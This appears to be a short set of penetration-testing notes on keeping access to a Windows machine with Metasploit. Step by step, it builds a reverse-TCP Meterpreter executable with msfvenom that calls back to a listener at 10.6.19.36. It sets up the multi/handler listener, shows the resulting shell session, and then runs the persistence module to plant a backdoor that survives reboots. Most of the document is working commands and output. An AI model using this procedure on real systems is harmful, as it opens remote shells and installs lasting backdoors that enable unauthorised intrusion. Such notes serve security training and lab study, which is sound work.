Persistence
Metasploit
Use msfvenom to create the payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.19.36 LPORT=4461 -f exe -o lashe.exe
Upload file to victim machine
Start msfconsole
Execute:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 10.6.19.36
msf exploit(multi/handler) > set LPORT 4461
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
Run listener
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.6.19.36:4461
Execute lashe.exe (our payload) in victim
We obtain the shell:

Background session
meterpreter > background
[*] Backgrounding session 1...
Use persistence module
msf exploit(multi/handler) > use exploit/windows/local/persistence
msf exploit(windows/local/persistence) >
Set background session
msf exploit(windows/local/persistence) > set session 1
Run persistence

If the system is shut down or reset for whatever reason you will lose your meterpreter session however by using the persistence module you create a backdoor into the system which you can access at any time using the metasploit multi handler and setting the payload to
windows/meterpreter/reverse_tcp
allowing you to send another meterpreter payload to the machine and open up a new meterpreter session.
Last updated